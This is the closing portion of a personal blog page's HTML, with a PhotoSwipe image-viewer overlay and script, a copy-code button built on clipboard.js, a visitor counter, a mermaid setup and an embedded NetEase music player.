            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=22707008&auto=0&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
    

  </div>
</body>

</html>